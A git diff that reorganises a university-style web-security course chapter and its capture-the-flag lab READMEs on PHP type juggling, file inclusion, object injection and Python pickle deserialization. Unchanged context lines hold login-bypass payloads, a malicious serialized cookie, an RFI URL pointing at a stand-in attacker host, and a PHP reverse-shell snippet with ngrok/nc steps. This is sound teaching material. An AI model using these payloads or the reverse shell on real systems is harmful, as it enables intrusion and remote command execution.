modified exotic attacks to open education hub standard

exotic-attacks/activities/breaking-hashes/README.md → chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/README.md

@@ -28,4 +28,4 @@ A possible payload in POST data is:
 
 `username[]="8"&password[]=8&submit=Login`
 
-Exploit in `../sol/solution.sh`.
+Exploit in `../solution/solution.sh`.

exotic-attacks/activities/defaced-website/README.md → chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/README.md

@@ -21,4 +21,4 @@ The final payload in POST data is:
 
 `username=QNKCDZO&password=&submit=Login`
 
-Exploit in `../sol/solution.sh`.
+Exploit in `../solution/solution.sh`.

exotic-attacks/activities/handy-tool/README.md → chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/README.md

@@ -7,6 +7,7 @@ LFI + PHP Object Injection / PHP Insecure Object Deserialization + RCE
 ## Exploit
 
 The exploit involves opening a reverse shell. You'll need to:
+
 1. Create an account on [ngrok](https://ngrok.com/) (also confirm your email address).
 2. Install `ngrok` on you machine.
 3. Forward your 1234 port using: `ngrok tcp 1234`. A ngrok host and IP will be forwarded to your local port.
@@ -26,8 +27,9 @@ You guessed it, the handy one is **Unserialize**.
 
 After inspecting the source code in the archive, you see what the serialized input object should look like.
 It has to be a PHP class with two attributes:
- * `$condition` - boolean with the value `true`
- * `$prop` - a string you can use for remote code execution on the server
+
+* `$condition` - boolean with the value `true`
+* `$prop` - a string you can use for remote code execution on the server
 
 Since the actual output of the command is not shown, only the unserialized string, you should try to create a reverse shell.
 
@@ -91,4 +93,4 @@ Now access `/backdoor.php` in the browser and you should have a shell in the `nc
 
 Find the flag file and perform a `cat` on it; it should be in `home/ctf/`: `cat /home/ctf/flag.txt`.
 
-Exploit in `../sol/solution.sh`.
+Exploit in `../solution/solution.sh`.

exotic-attacks/activities/jar-of-pickles/README.md → chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/README.md

@@ -46,4 +46,4 @@ Make the request again.
 You should have a shell now in the `nc` terminal.
 Find the flag file and perform a `cat` on it; it should be in `home/ctf/`: `cat /home/ctf/flag.txt`.
 
-Exploit in `../sol/solution.sh`.
+Exploit in `../solution/solution.sh`.

exotic-attacks/activities/meme-uploader/README.md → chapters/web-application-security/exotic-attacks/drills/tasks/meme-uploader/README.md

@@ -23,4 +23,4 @@ Now navigate to: `/uploads/5c7dce216dceb5c1a61108e9db9fa835.php`.
 
 The flag should be in the page source (inspect it).
 
-Exploit in `../sol/solution.sh`.
+Exploit in `../solution/solution.sh`.

exotic-attacks/activities/pro-replacer/README.md → chapters/web-application-security/exotic-attacks/drills/tasks/pro-replacer/README.md

@@ -33,4 +33,4 @@ Haystack: `m`
 
 Output: the flag
 
-Exploit in `../sol/solution.sh`.
+Exploit in `../solution/solution.sh`.

exotic-attacks/activities/todo-app/README.md → chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/README.md

@@ -30,4 +30,4 @@ So we have to make a request with the result as cookie:
 
 `Cookie: todos=760463360e4919ca238d1566fc26661fa%3A1%3A%7Bi%3A0%3BO%3A16%3A%22GPLSourceBloater%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D`
 
-Exploit in `../sol/solution.sh`.
+Exploit in `../solution/solution.sh`.

exotic-attacks/index.md → chapters/web-application-security/exotic-attacks/reading/index.md

@@ -13,14 +13,14 @@ The most common server-side language on the web today is still **PHP**.
 There are lots of legacy websites which used this language to begin with, and a complete refactor is just not worth it.
 Today, even if there are better options for the server-side choice, PHP is still pretty popular.
 
-![Server Side Languages Popularity](./assets/language-stats.png)
+![Server Side Languages Popularity](./media/language-stats.png)
 
 Source [here](https://w3techs.com/technologies/overview/programming_language).
 
 There are also lots of different PHP versions, each with its own vulnerabilities.
 A small insight into the distribution of versions across the web is:
 
-![PHP Versions Popularity](./assets/version-stats.png)
+![PHP Versions Popularity](./media/version-stats.png)
 
 Source [here](https://w3techs.com/technologies/details/pl-php).
 
@@ -39,7 +39,7 @@ But this kind of flexibility sometimes causes unexpected errors in the program f
 
 In this section we will discuss **PHP type juggling** and how this can lead to authentication bypass vulnerabilities.
 
-![Type Juggling examples](./assets/type-juggling.png)
+![Type Juggling examples](./media/type-juggling.png)
 
 ## How PHP compares values
 
@@ -88,7 +88,7 @@ The following tables showcase the difference between the two comparison modes:
 
 | Loose comparison    | Strict comparison   |
 | ------------------- | ------------------- |
-| ![Loose comparison](./assets/loose-comparison.png) | ![Strict comparison](./assets/strict-comparison.png) |
+| ![Loose comparison](./media/loose-comparison.png) | ![Strict comparison](./media/strict-comparison.png) |
 
 However, loose type comparison behavior like the one presented above is pretty common in PHP and many built-in functions work in the same way.
 You can probably already see how this can be very problematic, but how exactly can hackers exploit this behavior?
@@ -393,7 +393,7 @@ Potential web security consequences of a successful **RFI** attack range from **
 **Remote file inclusion** attacks usually occur when an application receives a path to a file as input for a web page and does not properly sanitize it.
 This allows an external URL to be supplied to the include function.
 
-![RFI Attack](./assets/what-is-rfi-attack.png)
+![RFI Attack](./media/what-is-rfi-attack.png)
 
 The above definitions are very similar, so what is the exact difference between the two of them and how does an exploit affect the web application in each case?
 
@@ -446,14 +446,15 @@ Payload: `http://example.com/?file=http://attacker.example.com/evil.php`
 This means that getting a reverse shell on a web server will grant you only the rights of the user running the website.
 In order to get root access on the machine, further **privilege escalation** methods should be employed, which you will learn about in a future session.
 
-### Example of a simple reverse shell in PHP:
+### Example of a simple reverse shell in PHP
 
 ```php
 <?php
     $sock = fsockopen("127.0.0.1",1234);
     $proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);
 ?>
 ```
+
 # Python Insecure Deserialization / `pickle` module
 
 We have looked at so many PHP vulnerabilities in this session, but you shouldn't be left with the impression that PHP is the only vulnerable language.
@@ -507,6 +508,7 @@ Reading a bit further down in the docs we can see that implementing `__reduce__`
 When a tuple is returned, it must be between two and six items long.
 Optional items can either be omitted, or `None` can be provided as their value.
 The semantics of each item are in order:
+>
 > * A callable object that will be called to create the initial version of the object.
 > * A tuple of arguments for the callable object. An empty tuple must be given if the callable does not accept any argument. [...]
 
@@ -550,18 +552,18 @@ In conclusion, the code should be properly tested before being put in production
 
 # Further Reading
 
-* https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf
-* https://www.netsparker.com/blog/web-security/php-type-juggling-vulnerabilities/
-* https://foxglovesecurity.com/2017/02/07/type-juggling-and-php-object-injection-and-sqli-oh-my/
-* https://hydrasky.com/network-security/php-string-comparison-vulnerabilities/
-* https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09
-* https://nitesculucian.github.io/2018/10/05/php-object-injection-cheat-sheet/
-* https://www.imperva.com/learn/application-security/rfi-remote-file-inclusion/
-* https://www.acunetix.com/blog/articles/remote-file-inclusion-rfi/
-* https://www.acunetix.com/blog/articles/local-file-inclusion-lfi/
-* https://bitquark.co.uk/blog/2013/07/23/the_unexpected_dangers_of_preg_replace
-* https://www.whitehatsec.com/blog/magic-hashes/
-* https://davidhamann.de/2020/04/05/exploiting-python-pickle/
+* <https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf>
+* <https://www.netsparker.com/blog/web-security/php-type-juggling-vulnerabilities/>
+* <https://foxglovesecurity.com/2017/02/07/type-juggling-and-php-object-injection-and-sqli-oh-my/>
+* <https://hydrasky.com/network-security/php-string-comparison-vulnerabilities/>
+* <https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09>
+* <https://nitesculucian.github.io/2018/10/05/php-object-injection-cheat-sheet/>
+* <https://www.imperva.com/learn/application-security/rfi-remote-file-inclusion/>
+* <https://www.acunetix.com/blog/articles/remote-file-inclusion-rfi/>
+* <https://www.acunetix.com/blog/articles/local-file-inclusion-lfi/>
+* <https://bitquark.co.uk/blog/2013/07/23/the_unexpected_dangers_of_preg_replace>
+* <https://www.whitehatsec.com/blog/magic-hashes/>
+* <https://davidhamann.de/2020/04/05/exploiting-python-pickle/>
 
 # Activities